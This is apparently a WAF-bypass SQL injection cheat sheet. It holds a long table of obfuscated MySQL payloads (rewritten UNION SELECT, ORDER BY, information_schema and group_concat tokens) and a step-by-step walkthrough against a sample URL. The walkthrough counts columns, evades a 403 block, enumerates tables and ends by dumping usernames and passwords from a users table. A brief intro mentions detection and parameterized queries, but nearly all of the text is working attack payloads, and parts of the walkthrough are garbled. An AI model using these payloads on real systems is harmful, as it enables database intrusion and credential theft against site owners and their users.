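Bypass WAF SQL Injection
Most rows below are rewritten forms of one SQL keyword, clause or function; the `[~] … [~]` rows name the original. The rewrites change letter case, insert inline comments, wrap tokens in MySQL conditional comments (`/*!50000 … */`, which MySQL parses as SQL rather than as a comment), or URL-encode characters. A filter that matches the literal keyword in the raw request then no longer sees it, while the database, or a decoding or stripping step in front of it, still ends up with the original token. For detection this means matching on the decoded, canonicalized input rather than on raw strings. For prevention it means parameterized queries, which keep request data out of the SQL text however it is spelled.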
| [~] order by [~] | |
| /**/ORDER/**/BY/**/ | |
| /*!order*/+/*!by*/ | |
| /*!ORDER BY*/ | |
| /*!50000ORDER BY*/ | |
| /*!50000ORDER*//**//*!50000BY*/ | |
| /*!12345ORDER*/+/*!BY*/ | |
| [~] UNION select [~] | |
| /*!50000%55nIoN*/ /*!50000%53eLeCt*/ | |
| %55nion(%53elect 1,2,3)-- - | |
| +union+distinct+select+ | |
| +union+distinctROW+select+ | |
| /**//*!12345UNION SELECT*//**/ | |
| /**//*!50000UNION SELECT*//**/ | |
| /**/UNION/**//*!50000SELECT*//**/ | |
| /*!50000UniON SeLeCt*/ | |
| union /*!50000%53elect*/ | |
| +#uNiOn+#sEleCt | |
| +#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
| /*!%55NiOn*/ /*!%53eLEct*/ | |
| /*!u%6eion*/ /*!se%6cect*/ | |
| +un/**/ion+se/**/lect | |
| uni%0bon+se%0blect | |
| %2f**%2funion%2f**%2fselect | |
| union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
| REVERSE(noinu)+REVERSE(tceles) | |
| /*--*/union/*--*/select/*--*/ | |
| union (/*!/**/ SeleCT */ 1,2,3) | |
| /*!union*/+/*!select*/ | |
| union+/*!select*/ | |
| /**/union/**/select/**/ | |
| /**/uNIon/**/sEleCt/**/ | |
| +%2F**/+Union/*!select*/ | |
| /**//*!union*//**//*!select*//**/ | |
| /*!uNIOn*/ /*!SelECt*/ | |
| +union+distinct+select+ | |
| +union+distinctROW+select+ | |
| uNiOn aLl sElEcT | |
| UNIunionON+SELselectECT | |
| /**/union/*!50000select*//**/ | |
| 0%a0union%a0select%09 | |
| %0Aunion%0Aselect%0A | |
| %55nion/**/%53elect | |
| uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
| %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ | |
| %0A%09UNION%0CSELECT%10NULL% | |
| /*!union*//*--*//*!all*//*--*//*!select*/ | |
| union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
| /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
| +UnIoN/*&a=*/SeLeCT/*&a=*/ | |
| union+sel%0bect | |
| +uni*on+sel*ect+ | |
| +#1q%0Aunion all#qa%0A#%0Aselect | |
| union(select (1),(2),(3),(4),(5)) | |
| UNION(SELECT(column)FROM(table)) | |
| %23xyz%0AUnIOn%23xyz%0ASeLecT+ | |
| %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ | |
| union(select(1),2,3) | |
| union (select 1111,2222,3333) | |
| uNioN (/*!/**/ SeleCT */ 11) | |
| union (select 1111,2222,3333) | |
| +#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
| /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ | |
| %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ | |
| +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ | |
| +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
| /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ | |
| +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ | |
| /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ | |
| /union\sselect/g | |
| /union\s+select/i | |
| /*!UnIoN*/SeLeCT | |
| +UnIoN/*&a=*/SeLeCT/*&a=*/ | |
| +uni>on+sel>ect+ | |
| +(UnIoN)+(SelECT)+ | |
| +(UnI)(oN)+(SeL)(EcT) | |
| +’UnI”On’+'SeL”ECT’ | |
| +uni on+sel ect+ | |
| +/*!UnIoN*/+/*!SeLeCt*/+ | |
| /*!u%6eion*/ /*!se%6cect*/ | |
| uni%20union%20/*!select*/%20 | |
| union%23aa%0Aselect | |
| /**/union/*!50000select*/ | |
| /^.*union.*$/ /^.*select.*$/ | |
| /*union*/union/*select*/select+ | |
| /*uni X on*/union/*sel X ect*/ | |
| +un/**/ion+sel/**/ect+ | |
| +UnIOn%0d%0aSeleCt%0d%0a | |
| UNION/*&test=1*/SELECT/*&pwn=2*/ | |
| un?<ion sel="">+un/**/ion+se/**/lect+ | |
| +UNunionION+SEselectLECT+ | |
| +uni%0bon+se%0blect+ | |
| %252f%252a*/union%252f%252a /select%252f%252a*/ | |
| /%2A%2A/union/%2A%2A/select/%2A%2A/ | |
| %2f**%2funion%2f**%2fselect%2f**%2f | |
| union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
| /*!UnIoN*/SeLecT+ | |
| [~] information_schema.tables [~] | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- - | |
| /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table | |
| /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table | |
| [~] concat() [~] | |
| CoNcAt() | |
| concat() | |
| CON%08CAT() | |
| CoNcAt() | |
| %0AcOnCat() | |
| /**//*!12345cOnCat*/ | |
| /*!50000cOnCat*/(/*!*/) | |
| unhex(hex(concat(table_name))) | |
| unhex(hex(/*!12345concat*/(table_name))) | |
| unhex(hex(/*!50000concat*/(table_name))) | |
| [~] group_concat() [~] | |
| /*!group_concat*/() | |
| gRoUp_cOnCAt() | |
| group_concat(/*!*/) | |
| group_concat(/*!12345table_name*/) | |
| group_concat(/*!50000table_name*/) | |
| /*!group_concat*/(/*!12345table_name*/) | |
| /*!group_concat*/(/*!50000table_name*/) | |
| /*!12345group_concat*/(/*!12345table_name*/) | |
| /*!50000group_concat*/(/*!50000table_name*/) | |
| /*!GrOuP_ConCaT*/() | |
| /*!12345GroUP_ConCat*/() | |
| /*!50000gRouP_cOnCaT*/() | |
| /*!50000Gr%6fuP_c%6fnCAT*/() | |
| unhex(hex(group_concat(table_name))) | |
| unhex(hex(/*!group_concat*/(/*!table_name*/))) | |
| unhex(hex(/*!12345group_concat*/(table_name))) | |
| unhex(hex(/*!12345group_concat*/(/*!table_name*/))) | |
| unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) | |
| unhex(hex(/*!50000group_concat*/(table_name))) | |
| unhex(hex(/*!50000group_concat*/(/*!table_name*/))) | |
| unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) | |
| convert(group_concat(table_name)+using+ascii) | |
| convert(group_concat(/*!table_name*/)+using+ascii) | |
| convert(group_concat(/*!12345table_name*/)+using+ascii) | |
| convert(group_concat(/*!50000table_name*/)+using+ascii) | |
| CONVERT(group_concat(table_name)+USING+latin1) | |
| CONVERT(group_concat(table_name)+USING+latin2) | |
| CONVERT(group_concat(table_name)+USING+latin3) | |
| CONVERT(group_concat(table_name)+USING+latin4) | |
| CONVERT(group_concat(table_name)+USING+latin5) |
waf bypass
SQL injection bypassing WAF (forbidden)
id=1+'UnI''On'+'SeL''ECT' 5. id=1+%55nion all /!12345%53elect/ 1,version(),3— 6.
id=1+UnIoN+SeLecT 1,2,3— 7. id=1+UnIOn/**/SeLect 1,2,3— 8. id=1+UNIunionON+SELselectECT
1,2,3— 9. id=1+/!UnIOn/+/!sElEcT/ 1,2,3— 10. id=1 and (select 1)=(Select 0xAA 1000 more
A’s)+UnIoN+SeLeCT 1,2,3— 11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
//T/1,2,3 14. id=1+//union/&id=/select/&id=/column/&id=/from/&id=/table-- 15. id=1+/
/union/&id=/select/&id=/1,2,3--
www.site.com/id?=4'
www.site.com/id?=4 oder by 1--error
www.site.com/id?=4 oder by 1--+ error :/
www.site.com/id?=4 oder by 1-- - error :/
www.site.com/id?=4 Group by 1-- - no error :D
www.site.com/id?=4 Group by 2-- no error
www.site.com/id?=4 Group by 3-- no error
www.site.com/id?=4 Group by 4-- no error
www.site.com/id?=4 Group by 5-- no error
www.site.com/id?=4 Group by 6-- no error
www.site.com/id?=4 Group by 7-- no error
www.site.com/id?=4 Group by 8-- error
part -2
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--
If the response is 403 (Forbidden), a WAF has blocked the request and a WAF bypass is needed.
let's try waf bypass
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+ error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+- error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7-- - error
This one works most often ( -- - )
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,2,3,4,5,6,7-- -
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,version(),3,4,5,6,7-- -
another way
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,@@Version,3,4,5,6,7-- -
for database name
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,@@database,3,4,5,6,7-- -
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,database(),3,4,5,6,7-- -
Part 3
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()-- - error :/ :/ :/
Now we will bypass this :)
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,/!table_name/,3,4,5,6,7+from /!information_schema/./!tables/ where table_schema=database()-- - :D :D :D
we got database :D :D :D
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,unhex(hex(column_name)),3,4,5,6,7+from /!information_schema/.columns where table_name='users'--
another way
The table name has to be converted to CHAR() using HackBar (a plugin for Firefox)
.......table_name=CHAR(117, 115, 101, 114, 115)-- -
If it still does not work after that, there are many other commands, etc.
unhex(hex(/!00000concat/(user,0x3a,pass)))
/!00000from/ users-- -
part 4
www.site.com/id?=-4 /!00000UnION/ SeLeCt 1,unhex(hex(/!00000concat/(username,0x3a,password))),3,4,5,6,7 /!00000from/ users-- -